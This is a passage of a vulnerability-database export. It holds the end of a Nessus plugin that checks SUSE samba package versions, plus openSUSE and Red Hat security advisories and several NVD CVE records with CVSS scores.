(rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-credentials-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-credentials0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-errors-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-errors0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-hostconfig-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-hostconfig0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-passdb-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-passdb0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy-python3-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy0-python3-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-util-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-util0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamdb-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamdb0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbclient-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbclient0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbconf-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbconf0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbldap-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbldap2-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbldap2-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libtevent-util-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libtevent-util0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwbclient-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwbclient0-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"python3-ldb-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"python3-ldb-debuginfo-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"python3-ldb-devel-2.0.12-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-ad-dc-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-ad-dc-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-client-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-client-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-core-devel-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-debugsource-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-dsdb-modules-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-dsdb-modules-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-python3-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-python3-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-python3-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-python3-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-winbind-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.11.11+git.180.2cf3b203f07-4.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldb / samba\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2020-09-01T19:37:07", "bulletinFamily": "unix", "cvelist": ["CVE-2020-10700", "CVE-2020-10730", "CVE-2020-10760", "CVE-2020-14303", "CVE-2020-10704", "CVE-2020-10745"], "description": "This update for ldb, samba fixes the following issues:\n\n Changes in samba:\n - Update to samba 4.11.11\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server when ASQ and\n VLV combined; (bso#14364); (bsc#1173159]\n + CVE-2020-10745: invalid DNS or NBT queries containing dots use several\n seconds of CPU each; (bso#14378); (bsc#1173160).\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog LDAP server\n with paged_result or VLV; (bso#14402); (bsc#1173161)\n + CVE-2020-14303: Endless loop from empty UDP packet sent to AD DC\n nbt_server; (bso#14417); (bsc#1173359).\n - Update to samba 4.11.10\n + Fix segfault when using SMBC_opendir_ctx() routine for share folder\n that contains incorrect symbols in any file name; (bso#14374).\n + vfs_shadow_copy2 doesn't fail case looking in snapdirseverywhere mode;\n (bso#14350)\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr; (bso#14413).\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n + winbindd: Fix a use-after-free when winbind clients exit; (bso#14382)\n + ldb: Bump version to 2.0.11, LMDB databases can grow without bounds.\n (bso#14330)\n - Update to samba 4.11.9\n + nmblib: Avoid undefined behaviour in handle_name_ptrs(); (bso#14242).\n + 'samba-tool group' commands do not handle group names with special\n chars correctly; (bso#14296).\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo is not valid;\n (bso#14237).\n + Missing check for DMAPI offline status in async DOS attributes;\n (bso#14293).\n + smbd: Ignore set NTACL requests which contain S-1-5-88 NFS ACEs;\n (bso#14307).\n + vfs_recycle: Prevent flooding the log if we're called on non-existant\n paths; (bso#14316)\n + smbd mistakenly updates a file's write-time on close; (bso#14320).\n + RPC handles cannot be differentiated in source3 RPC server;\n (bso#14359).\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW; (bso#14313).\n + nsswitch: Fix use-after-free causing segfault in _pam_delete_cred;\n (bso#14327).\n + Fix fruit:time machine max size on arm; (bso#13622)\n + CTDB recovery corner cases can cause record resurrection and node\n banning; (bso#14294).\n + ctdb: Fix a memleak; (bso#14348).\n + libsmb: Don't try to find posix stat info in SMBC_getatr().\n + ctdb-tcp: Move free of inbound queue to TCP restart; (bso#14295);\n (bsc#1162680).\n + s3/librpc/crypto: Fix double free with unresolved credential cache;\n (bso#14344); (bsc#1169095)\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n + CTDB recovery corner cases can cause record resurrection and node\n banning; (bso#14294)\n + Starting ctdb node that was powered off hard before results in\n recovery loop; (bso#14295); (bsc#1162680).\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap; (bso#14324)\n - Update to samba 4.11.8\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP Server with ASQ;\n (bso#14331); (bsc#1169850);\n + CVE-2020-10704: LDAP Denial of Service (stack overflow) in Samba AD\n DC; (bso#14334); (bsc#1169851);\n - Update to samba 4.11.7\n + s3: lib: nmblib. Clean up and harden nmb packet processing;\n (bso#14239).\n + s3: VFS: full_audit. Use system session_info if called from a\n temporary share definition; (bso#14283)\n + dsdb: Correctly handle memory in objectclass_attrs; (bso#14258).\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect results for\n SCOPE_ONE searches; (bso#14270)\n + auth: Fix CIDs 1458418 and 1458420 Null pointer dereferences;\n (bso#14247).\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n + winbind member (source3) fails local SAM auth with empty domain name;\n (bso#14247)\n + winbindd: Handling missing idmap in getgrgid(); (bso#14265).\n + lib:util: Log mkdir error on correct debug levels; (bso#14253).\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in Python 3.9;\n (bso#14266).\n + ctdb-tcp: Make error handling for outbound connection consistent;\n (bso#14274).\n - Update to samba 4.11.6\n + pygpo: Use correct method flags; (bso#14209).\n + vfs_ceph_snapshots: Fix root relative path handling; (bso#14216);\n (bsc#1141320).\n + Avoiding bad call flags with python 3.8, using METH_NOARGS instead of\n zero; (bso#14209).\n + source4/utils/oLschema2ldif: Include stdint.h before cmocka.h;\n (bso#14218).\n + docs-xml/winbindnssinfo: Clarify interaction with idmap_ad etc;\n (bso#14122).\n + smbd: Fix the build with clang; (bso#14251).\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n + s3: VFS: glusterfs: Reset nlinks for symlink entries during readdir;\n (bso#14182).\n + smbc_stat() doesn't return the correct st_mode and also the uid/gid is\n not filled (SMBv1) file; (bso#14101).\n + librpc: Fix string length checking in ndr_pull_charset_to_null();\n (bso#14219).\n + ctdb-scripts: Strip square brackets when gathering connection info;\n (bso#14227).\n\n - Add libnetapi-devel to baselibs conf, for wine usage; (bsc#1172307);\n\n - Installing: samba - samba-ad-dc.service does not exist and unit not\n found; (bsc#1171437);\n\n - Fix samba_winbind package is installing python3-base without python3\n package; (bsc#1169521);\n\n Changes in ldb:\n - Update to version 2.0.12\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server when ASQ and\n VLV combined; (bso#14364); (bsc#1173159).\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr; (bso#14413).\n + lib/ldb: add unit test for ldb_ldap internal code.\n - Update to version 2.0.11\n + lib ldb: lmdb init var before calling mdb_reader_check.\n + lib ldb: lmdb clear stale readers on write txn start; (bso#14330).\n + ldb tests: Confirm lmdb free list handling\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n", "edition": 1, "modified": "2020-09-01T18:22:15", "published": "2020-09-01T18:22:15", "id": "OPENSUSE-SU-2020:1313-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00002.html", "title": "Security update for ldb, samba (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-21T09:26:01", "bulletinFamily": "unix", "cvelist": ["CVE-2020-10700", "CVE-2020-10730", "CVE-2020-10760", "CVE-2020-14303", "CVE-2020-10704", "CVE-2020-10745"], "description": "This update for ldb, samba fixes the following issues:\n\n Changes in samba:\n - Update to samba 4.11.11\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server when ASQ and\n VLV combined; (bso#14364); (bsc#1173159]\n + CVE-2020-10745: invalid DNS or NBT queries containing dots use several\n seconds of CPU each; (bso#14378); (bsc#1173160).\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog LDAP server\n with paged_result or VLV; (bso#14402); (bsc#1173161)\n + CVE-2020-14303: Endless loop from empty UDP packet sent to AD DC\n nbt_server; (bso#14417); (bsc#1173359).\n - Update to samba 4.11.10\n + Fix segfault when using SMBC_opendir_ctx() routine for share folder\n that contains incorrect symbols in any file name; (bso#14374).\n + vfs_shadow_copy2 doesn't fail case looking in snapdirseverywhere mode;\n (bso#14350)\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr; (bso#14413).\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n + winbindd: Fix a use-after-free when winbind clients exit; (bso#14382)\n + ldb: Bump version to 2.0.11, LMDB databases can grow without bounds.\n (bso#14330)\n - Update to samba 4.11.9\n + nmblib: Avoid undefined behaviour in handle_name_ptrs(); (bso#14242).\n + 'samba-tool group' commands do not handle group names with special\n chars correctly; (bso#14296).\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo is not valid;\n (bso#14237).\n + Missing check for DMAPI offline status in async DOS attributes;\n (bso#14293).\n + smbd: Ignore set NTACL requests which contain S-1-5-88 NFS ACEs;\n (bso#14307).\n + vfs_recycle: Prevent flooding the log if we're called on non-existant\n paths; (bso#14316)\n + smbd mistakenly updates a file's write-time on close; (bso#14320).\n + RPC handles cannot be differentiated in source3 RPC server;\n (bso#14359).\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW; (bso#14313).\n + nsswitch: Fix use-after-free causing segfault in _pam_delete_cred;\n (bso#14327).\n + Fix fruit:time machine max size on arm; (bso#13622)\n + CTDB recovery corner cases can cause record resurrection and node\n banning; (bso#14294).\n + ctdb: Fix a memleak; (bso#14348).\n + libsmb: Don't try to find posix stat info in SMBC_getatr().\n + ctdb-tcp: Move free of inbound queue to TCP restart; (bso#14295);\n (bsc#1162680).\n + s3/librpc/crypto: Fix double free with unresolved credential cache;\n (bso#14344); (bsc#1169095)\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n + CTDB recovery corner cases can cause record resurrection and node\n banning; (bso#14294)\n + Starting ctdb node that was powered off hard before results in\n recovery loop; (bso#14295); (bsc#1162680).\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap; (bso#14324)\n - Update to samba 4.11.8\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP Server with ASQ;\n (bso#14331); (bsc#1169850);\n + CVE-2020-10704: LDAP Denial of Service (stack overflow) in Samba AD\n DC; (bso#14334); (bsc#1169851);\n - Update to samba 4.11.7\n + s3: lib: nmblib. Clean up and harden nmb packet processing;\n (bso#14239).\n + s3: VFS: full_audit. Use system session_info if called from a\n temporary share definition; (bso#14283)\n + dsdb: Correctly handle memory in objectclass_attrs; (bso#14258).\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect results for\n SCOPE_ONE searches; (bso#14270)\n + auth: Fix CIDs 1458418 and 1458420 Null pointer dereferences;\n (bso#14247).\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n + winbind member (source3) fails local SAM auth with empty domain name;\n (bso#14247)\n + winbindd: Handling missing idmap in getgrgid(); (bso#14265).\n + lib:util: Log mkdir error on correct debug levels; (bso#14253).\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in Python 3.9;\n (bso#14266).\n + ctdb-tcp: Make error handling for outbound connection consistent;\n (bso#14274).\n - Update to samba 4.11.6\n + pygpo: Use correct method flags; (bso#14209).\n + vfs_ceph_snapshots: Fix root relative path handling; (bso#14216);\n (bsc#1141320).\n + Avoiding bad call flags with python 3.8, using METH_NOARGS instead of\n zero; (bso#14209).\n + source4/utils/oLschema2ldif: Include stdint.h before cmocka.h;\n (bso#14218).\n + docs-xml/winbindnssinfo: Clarify interaction with idmap_ad etc;\n (bso#14122).\n + smbd: Fix the build with clang; (bso#14251).\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n + s3: VFS: glusterfs: Reset nlinks for symlink entries during readdir;\n (bso#14182).\n + smbc_stat() doesn't return the correct st_mode and also the uid/gid is\n not filled (SMBv1) file; (bso#14101).\n + librpc: Fix string length checking in ndr_pull_charset_to_null();\n (bso#14219).\n + ctdb-scripts: Strip square brackets when gathering connection info;\n (bso#14227).\n\n - Add libnetapi-devel to baselibs conf, for wine usage; (bsc#1172307);\n\n - Installing: samba - samba-ad-dc.service does not exist and unit not\n found; (bsc#1171437);\n\n - Fix samba_winbind package is installing python3-base without python3\n package; (bsc#1169521);\n\n Changes in ldb:\n - Update to version 2.0.12\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server when ASQ and\n VLV combined; (bso#14364); (bsc#1173159).\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr; (bso#14413).\n + lib/ldb: add unit test for ldb_ldap internal code.\n - Update to version 2.0.11\n + lib ldb: lmdb init var before calling mdb_reader_check.\n + lib ldb: lmdb clear stale readers on write txn start; (bso#14330).\n + ldb tests: Confirm lmdb free list handling\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n", "edition": 1, "modified": "2020-07-21T07:14:18", "published": "2020-07-21T07:14:18", "id": "OPENSUSE-SU-2020:1023-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00054.html", "title": "Security update for ldb, samba (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2020-08-05T16:04:32", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14327"], "description": "* Removed reports option for Satellite inventory script\n* Fixed Tower Server Side Request Forgery on Credentials (CVE-2020-14327)\n* Fixed the ``Job Type`` field to render properly when editing a Job Template\n* Fixed a notable delay running large project update clones\n* Fixed Tower to properly sync host facts for Red Hat Satellite 6.7 inventories\n* Fixed installations on Red Hat OpenShift 4.3 to no longer fail\n* Fixed the usage of certain SSH keys on RHEL8 when FIPS is enabled to work properly\n* Fixed upgrades from 3.5 to 3.6 on RHEL8 in order for PostgreSQL client libraries to be upgraded on Tower nodes, which fixes the backup/restore function\n* Fixed credential lookups from CyberArk AIM to no longer fail unexpectedly\n* Fixed the ability to add a user to an organization when they already had roles in the organization\n* Fixed manually added host variables to no longer be removed on VMWare vCenter inventory syncs\n* Fixed a number of issues related to Tower\u2019s reporting of metrics to Red Hat Automation Analytics", "modified": "2020-08-05T18:37:28", "published": "2020-08-05T18:36:15", "id": "RHSA-2020:3329", "href": "https://access.redhat.com/errata/RHSA-2020:3329", "type": "redhat", "title": "(RHSA-2020:3329) Moderate: Red Hat Ansible Tower 3.6.5-1 - RHEL7 Container", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-08-12T10:04:50", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14327", "CVE-2020-14328", "CVE-2020-14329", "CVE-2020-14337"], "description": "* Updated Named URLs to allow for testing the presence or absence of objects (CVE-2020-14337)\n* Fixed Tower Server Side Request Forgery on Credentials (CVE-2020-14327)\n* Fixed Tower Server Side Request Forgery on Webhooks (CVE-2020-14328)\n* Fixed Tower sensitive data exposure on labels (CVE-2020-14329) \n* Added local caching for downloaded roles and collections so they are not re-downloaded on nodes where they have already been updated\n* Fixed Tower\u2019s task scheduler to no longer deadlock for clustered installations with large numbers of nodes \n* Fixed the Credential Type definitions to no longer allow superusers to run unsafe Python code\n* Fixed credential lookups from CyberArk AIM to no longer fail unexpectedly\n* Fixed upgrades from 3.5 to 3.6 on RHEL8 in order for PostgreSQL client libraries to be upgraded on Tower nodes, which fixes the backup/restore function\n* Fixed backup/restore for PostgreSQL usernames that include capital letters\n* Fixed manually added host variables to no longer be removed on VMWare vCenter inventory syncs\n* Fixed Red Hat Satellite inventory syncs to allow Tower to properly respect the ``verify_ssl flag``", "modified": "2020-08-05T18:37:29", "published": "2020-08-05T18:36:06", "id": "RHSA-2020:3328", "href": "https://access.redhat.com/errata/RHSA-2020:3328", "type": "redhat", "title": "(RHSA-2020:3328) Moderate: Red Hat Ansible Tower 3.7.2-1 - RHEL7 Container", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T07:12:52", "description": "A CSRF vulnerability in Settings form in the Custom Simple Rss plugin 2.0.6 for WordPress allows attackers to change the plugin settings.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-07-30T13:15:00", "title": "CVE-2019-14327", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", 